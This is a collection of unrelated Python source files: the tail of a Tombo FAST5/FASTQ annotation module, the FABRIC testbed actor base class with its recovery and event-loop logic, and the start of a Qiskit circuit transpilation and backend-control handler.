try:
for line in fp:
rec_fields = line.split()
rec_short_fn = rec_fields[fn_field]
try:
rec_full_fn = full_fast5_fns[rec_short_fn]
except KeyError:
if not been_warned:
th.warning_message(
'Some records from the sequencing summaries do not ' +
'appear to have a matching FAST5 file.')
been_warned = True
continue
# convert filename to full filename and link to read id
fast5s_read_ids[rec_fields[id_field]] = rec_full_fn
except:
th.warning_message(
'Error parsing records for sequencing ' +
'summary file: ' + seq_summary_fn)
return fast5s_read_ids
##################################
###### Annotate FAST5s Main ######
##################################
def annotate_reads_with_fastq_main(args):
global VERBOSE
VERBOSE = not args.quiet
th.VERBOSE = VERBOSE
fast5s_basedir = (
args.fast5_basedir if args.fast5_basedir.endswith('/') else
args.fast5_basedir + '/')
if args.sequencing_summary_filenames:
fast5s_read_ids = _parse_sequencing_summary_files(
fast5s_basedir, args.sequencing_summary_filenames)
fq_slot_prepped = False
else:
fast5s_read_ids = _get_read_ids_and_prep_fastq_slot(
fast5s_basedir, args.basecall_group, args.basecall_subgroup,
args.overwrite, args.processes)
fq_slot_prepped = True
fastq_slot = '/'.join(('/Analyses', args.basecall_group,
args.basecall_subgroup))
_annotate_with_fastqs(
args.fastq_filenames, fast5s_read_ids, fastq_slot, fq_slot_prepped,
args.processes, args.basecall_group, args.basecall_subgroup,
args.overwrite)
return
if __name__ == '__main__':
sys.stderr.write('This is a module. See commands with `tombo -h`')
sys.exit(1)
|
actor.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2020 FABRIC Testbed
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Author: Komal Thareja (kthare10@renci.org)
import queue
import threading
import traceback
from typing import List
from fabric_cf.actor.core.apis.abc_delegation import ABCDelegation
from fabric_cf.actor.core.apis.abc_policy import ABCPolicy
from fabric_cf.actor.core.apis.abc_timer_task import ABCTimerTask
from fabric_cf.actor.core.apis.abc_actor_mixin import ABCActorMixin, ActorType
from fabric_cf.actor.core.apis.abc_actor_event import ABCActorEvent
from fabric_cf.actor.core.apis.abc_actor_proxy import ABCActorProxy
from fabric_cf.actor.core.apis.abc_actor_runnable import ABCActorRunnable
from fabric_cf.actor.core.apis.abc_query_response_handler import ABCQueryResponseHandler
from fabric_cf.actor.core.apis.abc_reservation_mixin import ABCReservationMixin
from fabric_cf.actor.core.apis.abc_slice import ABCSlice
from fabric_cf.actor.core.common.exceptions import ActorException
from fabric_cf.actor.core.container.message_service import MessageService
from fabric_cf.actor.core.kernel.failed_rpc import FailedRPC
from fabric_cf.actor.core.kernel.kernel_wrapper import KernelWrapper
from fabric_cf.actor.core.kernel.rpc_manager_singleton import RPCManagerSingleton
from fabric_cf.actor.core.kernel.resource_set import ResourceSet
from fabric_cf.actor.core.proxies.proxy import Proxy
from fabric_cf.actor.core.time.actor_clock import ActorClock
from fabric_cf.actor.core.time.term import Term
from fabric_cf.actor.core.util.id import ID
from fabric_cf.actor.core.util.iterable_queue import IterableQueue
from fabric_cf.actor.core.util.reflection_utils import ReflectionUtils
from fabric_cf.actor.core.util.reservation_set import ReservationSet
from fabric_cf.actor.security.auth_token import AuthToken
class ExecutionStatus:
"""
Execution status of an action on Actor Thread
"""
def __init__(self):
self.done = False
self.exception = None
self.result = None
self.lock = threading.Condition()
def mark_done(self):
"""
Mark as done
"""
self.done = True
class ActorEvent(ABCActorEvent):
"""
Actor Event
"""
def __init__(self, *, status: ExecutionStatus, runnable: ABCActorRunnable):
self.status = status
self.runnable = runnable
def process(self):
"""
Process an event
"""
try:
self.status.result = self.runnable.run()
except Exception as e:
traceback.print_exc()
self.status.exception = e
finally:
with self.status.lock:
self.status.done = True
self.status.lock.notify_all()
class ActorMixin(ABCActorMixin):
"""
Actor is the base class for all actor implementations
"""
DefaultDescription = "no description"
actor_count = 0
def __init__(self, *, auth: AuthToken = None, clock: ActorClock = None):
# Globally unique identifier for this actor.
self.guid = ID()
# Actor name.
self.name = None
# Actor type code.
self.type = ActorType.All
# Actor description.
self.description = self.DefaultDescription
# Identity object representing this actor.
self.identity = auth
# Actor policy object.
self.policy = None
# Actor plugin
self.plugin = None
# True if this actor has completed the recovery phase.
self.recovered = False
# The kernel wrapper.
self.wrapper = None
# logger
self.logger = None
# Factory for term.
self.clock = clock
# current cycle
self.current_cycle = -1
# True if the current tick is the first tick this actor has received.
self.first_tick = True
# Set to true when the actor is stopped.
self.stopped = False
# Initialization status.
self.initialized = False
# Contains a reference to the thread currently executing the timer handler.
# This field is set on entry and cleared on exit.
# The primary use of the field is to handle correctly stopping the actor.
self.thread = None
# A queue of timers that have fired and need to be processed.
self.timer_queue = queue.Queue()
self.event_queue = queue.Queue()
self.reservation_tracker = None
self.subscription_id = None
# Reservations to close once recovery is complete.
self.closing = ReservationSet()
self.thread_lock = threading.Lock()
self.actor_main_lock = threading.Condition()
self.message_service = None
def __getstate__(self):
state = self.__dict__.copy()
del state['recovered']
del state['wrapper']
del state['logger']
del state['clock']
del state['current_cycle']
del state['first_tick']
del state['stopped']
del state['initialized']
del state['thread_lock']
del state['thread']
del state['timer_queue']
del state['event_queue']
del state['reservation_tracker']
del state['subscription_id']
del state['actor_main_lock']
del state['closing']
del state['message_service']
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.recovered = False
self.wrapper = None
self.logger = None
self.clock = None
self.current_cycle = -1
self.first_tick = True
self.stopped = False
self.initialized = False
self.thread = None
self.thread_lock = threading.Lock()
self.timer_queue = queue.Queue()
self.event_queue = queue.Queue()
self.subscription_id = None
self.actor_main_lock = threading.Condition()
self.closing = ReservationSet()
self.message_service = None
self.policy.set_actor(actor=self)
def actor_added(self):
self.plugin.actor_added()
def actor_removed(self):
return
def fail(self, *, rid: ID, message: str):
self.wrapper.fail(rid=rid, message=message)
def fail_delegation(self, *, did: str, message: str):
self.wrapper.fail_delegation(did=did, message=message)
def close_by_rid(self, *, rid: ID):
self.wrapper.close(rid=rid)
def close(self, *, reservation: ABCReservationMixin):
if reservation is not None:
if not self.recovered:
self.logger.debug("Adding reservation: {} to closing list".format(reservation.get_reservation_id()))
self.closing.add(reservation=reservation)
else:
self.logger.debug("Closing reservation: {}".format(reservation.get_reservation_id()))
self.wrapper.close(rid=reservation.get_reservation_id())
def close_slice_reservations(self, *, slice_id: ID):
self.wrapper.close_slice_reservations(slice_id=slice_id)
def close_reservations(self, *, reservations: ReservationSet):
for reservation in reservations.values():
try:
self.logger.debug("Closing reservation: {}".format(reservation.get_reservation_id()))
self.close(reservation=reservation)
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Could not close for #{} {}".format(reservation.get_reservation_id(), e))
def error(self, *, err: str):
"""
Logs and propagates a general error.
@param err
log/exception message.
@throws Exception
always
"""
self.logger.error(err)
raise ActorException(err)
def extend(self, *, rid: ID, resources: ResourceSet, term: Term):
self.wrapper.extend_reservation(rid=rid, resources=resources, term=term)
def external_tick(self, *, cycle: int):
self.logger.info("External Tick start cycle: {}".format(cycle))
class TickEvent(ABCActorEvent):
def __init__(self, *, base, cycle: int):
self.base = base
self.cycle = cycle
def __str__(self):
return "{} {}".format(self.base, self.cycle)
def process(self):
self.base.actor_tick(cycle=self.cycle)
self.queue_event(incoming=TickEvent(base=self, cycle=cycle))
self.logger.info("External Tick end cycle: {}".format(cycle))
def actor_tick(self, *, cycle: int):
"""
Actor Tick
:param cycle: cycle
:return:
"""
try:
if not self.recovered:
self.logger.warning("Tick for an actor that has not completed recovery")
return
current_cycle = 0
if self.first_tick:
current_cycle = cycle
else:
current_cycle = self.current_cycle + 1
while current_cycle <= cycle:
self.logger.info("actor_tick: {} start".format(current_cycle))
self.current_cycle = current_cycle
self.policy.prepare(cycle=self.current_cycle)
if self.first_tick:
self.reset()
self.tick_handler()
self.policy.finish(cycle=self.current_cycle)
self.wrapper.tick()
self.first_tick = False
self.logger.info("actor_tick: {} end".format(current_cycle))
current_cycle += 1
except Exception as e:
self.logger.debug(traceback.format_exc())
raise e
def get_actor_clock(self) -> ActorClock:
return self.clock
def get_client_slices(self) -> List[ABCSlice]:
return self.wrapper.get_client_slices()
def get_current_cycle(self) -> int:
return self.current_cycle
def get_description(self) -> str:
return self.description
def get_guid(self) -> ID:
if self.identity is not None:
return self.identity.get_guid()
return None
def get_identity(self) -> AuthToken:
return self.identity
def get_inventory_slices(self) -> List[ABCSlice]:
"""
Get inventory slices
@return inventory slices
"""
return self.wrapper.get_inventory_slices()
def get_logger(self):
return self.logger
def get_name(self) -> str:
return self.name
def get_policy(self) -> ABCPolicy:
return self.policy
def get_delegation(self, *, did: str) -> ABCDelegation:
return self.wrapper.get_delegation(did=did)
def get_reservation(self, *, rid: ID) -> ABCReservationMixin:
return self.wrapper.get_reservation(rid=rid)
def get_reservations(self, *, slice_id: ID) -> List[ABCReservationMixin]:
return self.wrapper.get_reservations(slice_id=slice_id)
def get_plugin(self):
return self.plugin
def get_slice(self, *, slice_id: ID) -> ABCSlice:
return self.wrapper.get_slice(slice_id=slice_id)
def get_slices(self):
return self.wrapper.get_slices()
def get_type(self) -> ActorType:
return self.type
def initialize(self):
from fabric_cf.actor.core.container.globals import GlobalsSingleton
if not self.initialized:
if self.identity is None or self.plugin is None or self.policy is None:
raise ActorException(f"The actor is not properly created: identity: {self.identity} "
f"plugin: {self.plugin} policy: {self.policy}")
if self.name is None:
self.name = self.identity.get_name()
if self.name is None:
raise ActorException("The actor is not properly created: no name")
if self.clock is None:
self.clock = GlobalsSingleton.get().get_container().get_actor_clock()
if self.clock is None:
raise ActorException("The actor is not properly created: no clock")
if self.logger is None:
self.logger = GlobalsSingleton.get().get_logger()
self.plugin.set_actor(actor=self)
self.plugin.set_logger(logger=self.logger)
self.plugin.initialize()
self.policy.set_actor(actor=self)
self.policy.initialize()
self.policy.set_logger(logger=self.logger)
self.wrapper = KernelWrapper(actor=self, plugin=self.plugin, policy=self.policy)
self.current_cycle = -1
self.setup_message_service()
self.initialized = True
def is_recovered(self) -> bool:
return self.recovered
def is_stopped(self) -> bool:
return self.stopped
def query(self, *, query: dict = None, caller: AuthToken = None, actor_proxy: ABCActorProxy = None,
handler: ABCQueryResponseHandler = None, id_token: str = None) -> dict:
"""
Query an actor
@param query query
@param caller caller
@param actor_proxy actor proxy
@param handler response handler
@param id_token identity token
"""
if actor_proxy is None and handler is None:
return self.wrapper.query(properties=query, caller=caller, id_token=id_token)
else:
callback = Proxy.get_callback(actor=self, protocol=actor_proxy.get_type())
RPCManagerSingleton.get().query(actor=self, remote_actor=actor_proxy, callback=callback, query=query,
handler=handler, id_token=id_token)
return None
def recover(self):
"""
Recover
"""
self.logger.info("Starting recovery")
self.recovery_starting()
self.logger.debug("Recovering inventory slices")
inventory_slices = self.plugin.get_database().get_inventory_slices()
self.logger.debug("Found {} inventory slices".format(len(inventory_slices)))
self.recover_slices(slices=inventory_slices)
self.logger.debug("Recovery of inventory slices complete")
self.logger.debug("Recovering client slices")
client_slices = self.plugin.get_database().get_client_slices()
self.logger.debug("Found {} client slices".format(len(client_slices)))
self.recover_slices(slices=client_slices)
self.logger.debug("Recovery of client slices complete")
self.recovered = True
self.recovery_ended()
self.logger.info("Recovery complete")
def recovery_starting(self):
"""
Recovery starting
"""
self.plugin.recovery_starting()
self.policy.recovery_starting()
def recovery_ended(self):
"""
Recovery ended
"""
self.plugin.recovery_ended()
self.policy.recovery_ended()
def recover_slices(self, *, slices: List[ABCSlice]):
"""
Recover slices
@param slices slices
"""
for s in slices:
try:
self.recover_slice(slice_obj=s)
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Error in recoverSlice for property list {}".format(e))
if s.is_inventory():
raise e
def recover_slice(self, *, slice_obj: ABCSlice):
"""
Recover slice
@param slice_obj slice_obj
"""
slice_id = slice_obj.get_slice_id()
if self.get_slice(slice_id=slice_id) is not None:
self.logger.debug("Found slice_id: {} slice:{}".format(slice_id, slice_obj))
else:
self.logger.info("Recovering slice: {}".format(slice_id))
self.logger.debug("Informing the plugin about the slice")
self.plugin.revisit(slice_obj=slice_obj)
self.logger.debug("Registering slice: {}".format(slice_id))
self.re_register_slice(slice_object=slice_obj)
self.logger.debug("Recovering reservations in slice: {}".format(slice_id))
self.recover_reservations(slice_obj=slice_obj)
self.logger.debug("Recovering delegations in slice: {}".format(slice_id))
self.recover_delegations(slice_obj=slice_obj)
self.logger.info("Recovery of slice {} complete".format(slice_id))
def recover_reservations(self, *, slice_obj: ABCSlice):
"""
Recover reservations
@param slice_obj slice object
"""
self.logger.info(
"Starting to recover reservations in slice {}({})".format(slice_obj.get_name(), slice_obj.get_slice_id()))
reservations = None
try:
reservations = self.plugin.get_database().get_reservations_by_slice_id(slice_id=slice_obj.get_slice_id())
except Exception as e:
self.logger.error(e)
raise ActorException(
"Could not fetch reservation records for slice {}({}) from database".format(slice_obj.get_name(),
slice_obj.get_slice_id()))
self.logger.debug("There are {} reservations(s) in slice".format(len(reservations)))
for r in reservations:
try:
self.recover_reservation(r=r, slice_obj=slice_obj)
except Exception as e:
self.logger.error("Unexpected error while recovering reservation {}".format(e))
self.logger.info("Recovery for reservations in slice {} completed".format(slice_obj))
def recover_reservation(self, *, r: ABCReservationMixin, slice_obj: ABCSlice):
"""
Recover reservation
@param r reservation
@param slice_obj slice object
"""
try:
r.restore(actor=self, slice_obj=slice_obj)
self.logger.info(
"Found reservation # {} in state {}".format(r.get_reservation_id(), r.get_reservation_state()))
if r.is_closed():
self.logger.info("Reservation #{} is closed. Nothing to recover.".format(r.get_reservation_id()))
return
self.logger.info("Recovering reservation #{}".format(r.get_reservation_id()))
self.logger.debug("Recovering reservation object r={}".format(r))
self.logger.debug("Registering the reservation with the actor")
self.re_register(reservation=r)
self.logger.info(r)
self.logger.debug("Revisiting with the Plugin")
self.plugin.revisit(reservation=r)
self.logger.info(r)
self.logger.debug("Revisiting with the actor policy")
self.policy.revisit(reservation=r)
self.logger.info("Recovered reservation #{}".format(r.get_reservation_id()))
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Exception occurred in recovering reservation e={}".format(e))
raise ActorException("Could not recover Reservation #{}".format(r))
def recover_delegations(self, *, slice_obj: ABCSlice):
"""
Recover delegations for a slice
@param slice_obj slice object
"""
self.logger.info(
"Starting to recover delegations in slice {}({})".format(slice_obj.get_name(), slice_obj.get_slice_id()))
delegations = None
try:
delegations = self.plugin.get_database().get_delegations_by_slice_id(slice_id=slice_obj.get_slice_id())
except Exception as e:
self.logger.error(e)
raise ActorException(
"Could not fetch delegations records for slice {}({}) from database".format(slice_obj.get_name(),
slice_obj.get_slice_id()))
self.logger.debug("There are {} delegations(s) in slice".format(len(delegations)))
for d in delegations:
try:
self.logger.info("Delegation has properties: {}".format(d))
self.recover_delegation(d=d, slice_obj=slice_obj)
except Exception as e:
self.logger.error("Unexpected error while recovering delegation {}".format(e))
self.logger.info("Recovery for delegations in slice {} completed".format(slice_obj))
def recover_delegation(self, *, d: ABCDelegation, slice_obj: ABCSlice):
"""
Recover delegation
@param d delegation
@param slice_obj slice object
"""
try:
d.restore(actor=self, slice_obj=slice_obj)
self.logger.info(
"Found delegation # {} in state {}".format(d.get_delegation_id(), d.get_state_name()))
if d.is_closed():
self.logger.info("Delegation #{} is closed. Nothing to recover.".format(d.get_delegation_id()))
return
self.logger.info("Recovering delegation #{}".format(d.get_delegation_id()))
self.logger.debug("Recovering delegation object d={}".format(d))
self.logger.debug("Registering the delegation with the actor")
self.re_register_delegation(delegation=d)
self.logger.info(d)
self.logger.debug("Revisiting with the Plugin")
self.plugin.revisit(delegation=d)
self.logger.info(d)
self.logger.debug("Revisiting with the actor policy")
self.policy.revisit_delegation(delegation=d)
self.logger.info("Recovered delegation #{}".format(d.get_delegation_id()))
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Exception occurred in recovering delegation e={}".format(e))
raise ActorException("Could not recover delegation #{}".format(d))
def register(self, *, reservation: ABCReservationMixin):
self.wrapper.register_reservation(reservation=reservation)
def register_slice(self, *, slice_object: ABCSlice):
self.wrapper.register_slice(slice_object=slice_object)
def register_delegation(self, *, delegation: ABCDelegation):
self.wrapper.register_delegation(delegation=delegation)
def remove_reservation(self, *, reservation: ABCReservationMixin = None, rid: ID = None):
if reservation is not None:
self.wrapper.remove_reservation(rid=reservation.get_reservation_id())
if rid is not None:
self.wrapper.remove_reservation(rid=rid)
def remove_slice(self, *, slice_object: ABCSlice):
self.wrapper.remove_slice(slice_id=slice_object.get_slice_id())
def remove_slice_by_slice_id(self, *, slice_id: ID):
self.wrapper.remove_slice(slice_id=slice_id)
def re_register_delegation(self, *, delegation: ABCDelegation):
self.wrapper.re_register_delegation(delegation=delegation)
def re_register(self, *, reservation: ABCReservationMixin):
self.wrapper.re_register_reservation(reservation=reservation)
def re_register_slice(self, *, slice_object: ABCSlice):
self.wrapper.re_register_slice(slice_object=slice_object)
def issue_delayed(self):
"""
Issues delayed operations
"""
assert self.recovered
self.close_reservations(reservations=self.closing)
self.closing.clear()
def reset(self):
"""
Reset an actor
"""
self.issue_delayed()
self.policy.reset()
def set_actor_clock(self, *, clock):
"""
Set actor clock
@param clock clock
"""
self.clock = clock
def set_description(self, *, description: str):
"""
Set description
@param description description
"""
self.description = description
def set_identity(self, *, token: AuthToken):
"""
Set identity
@param token token
"""
self.identity = token
self.name = self.identity.get_name()
self.guid = token.get_guid()
def set_policy(self, *, policy):
"""
Set policy
@param policy policy
"""
self.policy = policy
def set_recovered(self, *, value: bool):
"""
Set recovered flag
@param value value
"""
self.recovered = value
def set_plugin(self, *, plugin):
"""
Set plugin
@param plugin
"""
self.plugin = plugin
def set_stopped(self, *, value: bool):
"""
Set stopped flag
@param value value
"""
self.stopped = value
def is_on_actor_thread(self) -> bool:
"""
Check if running on actor thread
@return true if running on actor thread, false otherwise
"""
result = False
try:
self.thread_lock.acquire()
result = self.thread == threading.current_thread()
finally:
self.thread_lock.release()
return result
def execute_on_actor_thread_and_wait(self, *, runnable: ABCActorRunnable):
"""
Execute an incoming action on actor thread
@param runnable incoming action/operation
"""
if self.is_on_actor_thread():
return runnable.run()
else:
status = ExecutionStatus()
event = ActorEvent(status=status, runnable=runnable)
self.queue_event(incoming=event)
with status.lock:
while not status.done:
status.lock.wait()
if status.exception is not None:
raise status.exception
return status.result
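# Minimal usage sketch (hypothetical runnable, not defined in this module): a caller
# wraps work in an ABCActorRunnable; execute_on_actor_thread_and_wait queues it as an
# ActorEvent and blocks on ExecutionStatus.lock until process() marks it done.
#
#   class GetSliceCount(ABCActorRunnable):
#       def run(self):
#           return len(actor.get_slices())
#
#   count = actor.execute_on_actor_thread_and_wait(runnable=GetSliceCount())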
def run(self):
"""
Actor run function for actor thread
"""
try:
self.logger.info("Actor Main Thread started")
self.actor_count -= 1
self.actor_main()
except Exception as e:
self.logger.error(f"Unexpected error {e}")
self.logger.error(traceback.format_exc())
finally:
self.logger.info("Actor Main Thread exited")
def start(self):
"""
Start an Actor
"""
try:
self.thread_lock.acquire()
if self.thread is not None:
raise ActorException("This actor has already been started")
self.thread = threading.Thread(target=self.run)
self.thread.name = self.get_name()
self.thread.daemon = True
self.thread.start()
finally:
self.thread_lock.release()
self.message_service.start()
if self.plugin.get_handler_processor() is not None:
self.plugin.get_handler_processor().start()
def stop(self):
"""
Stop an actor
"""
self.stopped = True
self.message_service.stop()
try:
self.thread_lock.acquire()
temp = self.thread
self.thread = None
if temp is not None:
self.logger.warning("It seems that the actor thread is running. Interrupting it")
try:
# TODO find equivalent of interrupt
with self.actor_main_lock:
self.actor_main_lock.notify_all()
temp.join()
except Exception as e:
self.logger.error("Could not join actor thread {}".format(e))
self.logger.error(traceback.format_exc())
finally:
self.thread_lock.release()
finally:
if self.thread_lock is not None and self.thread_lock.locked():
self.thread_lock.release()
if self.plugin.get_handler_processor() is not None:
self.plugin.get_handler_processor().shutdown()
def tick_handler(self):
"""
Tick handler
"""
def handle_failed_rpc(self, *, rid: ID, rpc: FailedRPC):
"""
Handler failed rpc
"""
self.wrapper.process_failed_rpc(rid=rid, rpc=rpc)
def __str__(self):
return "actor: [{}/{}]".format(self.name, self.guid)
def unregister(self, *, reservation: ABCReservationMixin, rid: ID):
"""
Unregister reservation
@param reservation reservation
@param rid reservation id
"""
if reservation is not None:
self.wrapper.unregister_reservation(rid=reservation.get_reservation_id())
if rid is not None:
self.wrapper.unregister_reservation(rid=rid)
def unregister_slice(self, *, slice_object: ABCSlice):
"""
Unregister slice
@param slice_object slice object
"""
self.wrapper.unregister_slice(slice_id=slice_object.get_slice_id())
def unregister_slice_by_slice_id(self, *, slice_id: ID):
"""
Unregister slice by slice id
@param slice_id slice id
"""
self.wrapper.unregister_slice(slice_id=slice_id)
def queue_timer(self, timer: ABCTimerTask):
"""
Queue an event on Actor timer queue
"""
with self.actor_main_lock:
self.timer_queue.put_nowait(timer)
self.logger.debug("Added timer to timer queue {}".format(timer.__class__.__name__))
self.actor_main_lock.notify_all()
def queue_event(self, *, incoming: ABCActorEvent):
"""
Queue an event on the Actor Event Queue
"""
with self.actor_main_lock:
self.event_queue.put_nowait(incoming)
self.logger.debug("Added event to event queue {}".format(incoming.__class__.__name__))
self.actor_main_lock.notify_all()
def await_no_pending_reservations(self):
"""
Await until no pending reservations
"""
self.wrapper.await_nothing_pending()
def actor_main(self):
"""
Actor Main loop
"""
while True:
events = []
timers = []
with self.actor_main_lock:
while self.event_queue.empty() and self.timer_queue.empty() and not self.stopped:
try:
self.actor_main_lock.wait()
except InterruptedError as e:
self.logger.info("Actor thread interrupted. Exiting")
return
if self.stopped:
self.logger.info("Actor exiting")
return
if not self.event_queue.empty():
try:
for event in IterableQueue(source_queue=self.event_queue):
events.append(event)
except Exception as e:
self.logger.error(f"Error while adding event to event queue! e: {e}")
self.logger.error(traceback.format_exc())
if not self.timer_queue.empty():
try:
for timer in IterableQueue(source_queue=self.timer_queue):
timers.append(timer)
except Exception as e:
self.logger.error(f"Error while adding event to event queue! e: {e}")
self.logger.error(traceback.format_exc())
self.actor_main_lock.notify_all()
if len(events) > 0:
self.logger.debug(f"Processing {len(events)} events")
for event in events:
#self.logger.debug("Processing event of type {}".format(type(e)))
#self.logger.debug("Processing event {}".format(e))
try:
event.process()
except Exception as e:
self.logger.error(f"Error while processing event {type(event)}, {e}")
self.logger.error(traceback.format_exc())
if len(timers) > 0:
self.logger.debug(f"Processing {len(timers)} timers")
for t in timers:
try:
t.execute()
except Exception as e:
self.logger.error(f"Error while processing a timer {type(t)}, {e}")
self.logger.error(traceback.format_exc())
def setup_message_service(self):
"""
Set up Message Service for incoming Kafka Messages
"""
try:
# Kafka Proxy Service object
module_name = self.get_kafka_service_module()
class_name = self.get_kafka_service_class()
kafka_service = ReflectionUtils.create_instance_with_params(module_name=module_name,
class_name=class_name)(actor=self)
# Kafka Management Service object
module_name = self.get_mgmt_kafka_service_module()
class_name = self.get_mgmt_kafka_service_class()
kafka_mgmt_service = ReflectionUtils.create_instance_with_params(module_name=module_name,
class_name=class_name)()
kafka_mgmt_service.set_logger(logger=self.logger)
# Incoming Message Service
from fabric_cf.actor.core.container.globals import GlobalsSingleton
config = GlobalsSingleton.get().get_config()
topic = config.get_actor().get_kafka_topic()
topics = [topic]
consumer_conf = GlobalsSingleton.get().get_kafka_config_consumer()
self.message_service = MessageService(kafka_service=kafka_service, kafka_mgmt_service=kafka_mgmt_service,
consumer_conf=consumer_conf,
key_schema_location=GlobalsSingleton.get().get_config().get_kafka_key_schema_location(),
value_schema_location=GlobalsSingleton.get().get_config().get_kafka_value_schema_location(),
topics=topics, logger=self.logger)
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Failed to setup message service e={}".format(e))
raise e
def set_logger(self, logger):
self.logger = logger
if self.policy is not None:
self.policy.set_logger(logger=logger)
if self.plugin is not None:
self.plugin.set_logger(logger=logger)
def load_model(self, *, graph_id: str):
return
|
execution_handler.py
|
import copy
import math
import time
from collections import Counter
from concurrent.futures.process import BrokenProcessPool
from queue import Empty, Queue
from threading import Lock, Thread
from typing import Dict, List, Union
import logger
import psutil
import qiskit.providers.ibmq.job.exceptions
import qiskit.tools.parallel
from qiskit import QuantumCircuit, assemble, transpile
from qiskit.providers import Backend
from qiskit.providers.ibmq.accountprovider import AccountProvider
from qiskit.providers.job import Job
from qiskit.providers.provider import Provider
from qiskit.qobj import Qobj
from qiskit.result.models import ExperimentResultData
from qiskit.result.result import Result
from quantum_execution_job import QuantumExecutionJob
def new_parallel_map(task, values, task_args=tuple(), task_kwargs={}, num_processes=qiskit.tools.parallel.CPU_COUNT):
if num_processes == psutil.cpu_count(logical=True) and num_processes > 1:
# at least one free logical core
num_processes -= 1
print(f"num_processes={num_processes}")
return qiskit.tools.parallel.parallel_map(task, values, task_args, task_kwargs, num_processes)
# overwrite the parallel_map function to control the number of CPU cores used during transpilation
transpile.__globals__["parallel_map"] = new_parallel_map
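# Illustrative effect of the override (assumed machine with 8 logical cores): when the
# requested process count equals the logical core count, new_parallel_map drops it by
# one so a core stays free for the main thread, then delegates to qiskit's parallel_map.
#
#   circuits = [QuantumCircuit(2) for _ in range(100)]          # hypothetical input
#   transpiled = transpile(circuits, backend=some_backend)      # now runs on 7 workers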
class BackendLookUp():
"""Look up information about the remote backends
"""
def __init__(self, provider:Provider) -> None:
self._log = logger.get_logger(type(self).__name__)
self._provider = provider
self._backends = {}
def get(self, backend_name:str, exclusiv=False) -> Backend:
"""Get the corresponding backend
Args:
backend_name (str)
exclusiv (bool, optional): If True, return a new exclusive Backend instance instead of a cached one. Defaults to False.
Returns:
Backend: representing the remote QPU
"""
if exclusiv:
return self._provider.get_backend(backend_name)
try:
backend = self._backends[backend_name]
except KeyError:
backend = self._provider.get_backend(backend_name)
self._log.info(f"Retrieved backend {backend_name}")
self._backends[backend_name] = backend
return backend
def max_shots(self, backend_name:str) -> int:
backend = self.get(backend_name)
return backend.configuration().max_shots
def max_experiments(self, backend_name:str) -> int:
backend = self.get(backend_name)
return backend.configuration().max_experiments
class BackendControl():
"""Control the access to the backends to regulate the number of queued jobs"""
def __init__(self,):
self._log = logger.get_logger(type(self).__name__)
self._locks = {}
self._counters = {}
def try_to_enter(self, backend_name:str, backend:Backend) -> bool:
"""Try to enter the lock of the backend
Args:
backend_name (str)
backend (Backend)
Returns:
bool: True, if successfully entered the lock. False, otherwise
"""
try:
lock = self._locks[backend_name]
counter = self._counters[backend_name]
except KeyError:
lock = Lock()
counter = 0
self._locks[backend_name] = lock
self._counters[backend_name] = counter
with lock:
limit = backend.job_limit()
self._log.debug(f"Backend: {backend_name} Counter:{counter} Active_Jobs:{limit.active_jobs} Maximum_jobs:{limit.maximum_jobs}")
if limit.active_jobs < limit.maximum_jobs:
if counter < limit.maximum_jobs:
self._counters[backend_name] += 1
return True
return False
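# Usage sketch mirroring how Submitter and Retriever use this class (the backend name is
# an example): enter before submitting a job, leave once the job reaches a final state.
#
#   control = BackendControl()
#   if control.try_to_enter("ibmq_qasm_simulator", backend):
#       job = backend.run(qobj)
#       ...                                      # later, when job.in_final_state()
#       control.leave("ibmq_qasm_simulator")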
def leave(self, backend_name:str):
"""Leave the lock of the backend
Args:
backend_name (str)
"""
with self._locks[backend_name]:
self._counters[backend_name] -= 1
class Transpiler():
def __init__(self, input:Queue, output:Queue, backend_look_up:BackendLookUp, timeout:int, max_transpile_batch_size:Union[float, int]=float('inf')) -> None:
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._backend_look_up = backend_look_up
self._timeout = timeout
self._max_transpile_batch_size = max_transpile_batch_size
self._jobs_to_transpile = {}
self._timers = {}
self._pending_transpilation = {}
self._pending = Queue()
self._finished = Queue()
self._log.info("Init")
def start(self):
Thread(target=self._route_job).start()
Thread(target=self._transpile).start()
self._log.info("Started")
def _transpile(self):
"""Function that transpiles the pending transpilation Batches
Raises:
e: BrokenProcessPool
"""
while True:
backend_name, jobs = self._pending.get()
backend = self._backend_look_up.get(backend_name)
circuits = list([job.circuit for job in jobs])
self._log.debug(f"Start transpilation of {len(circuits)} circuits for backend {backend.name()}")
trans_start_time = time.time()
tries = 3
for i in range(tries):
try:
transpiled_circuits = transpile(circuits, backend=backend)
break
except BrokenProcessPool as e:
if hasattr(e, 'message'):
self._log.info(f"In try {i} the following error occured {e.message}")
else:
self._log.exception(e)
if i == tries-1:
raise e
time_diff = time.time() - trans_start_time
self._log.info(f"Transpiled {len(transpiled_circuits)} circuits for backend {backend.name()} in {time_diff}s")
self._finished.put((backend_name, zip(transpiled_circuits, jobs)))
def _create_transpilation_batch(self, backend_name:str) -> bool:
"""Creates a batch for the transpilation for the given backend, if there is not already a pending transpilation for the backend
Args:
backend_name (str)
Returns:
bool: True, if a batch was created
"""
try:
if self._pending_transpilation[backend_name]:
return False
except KeyError:
pass
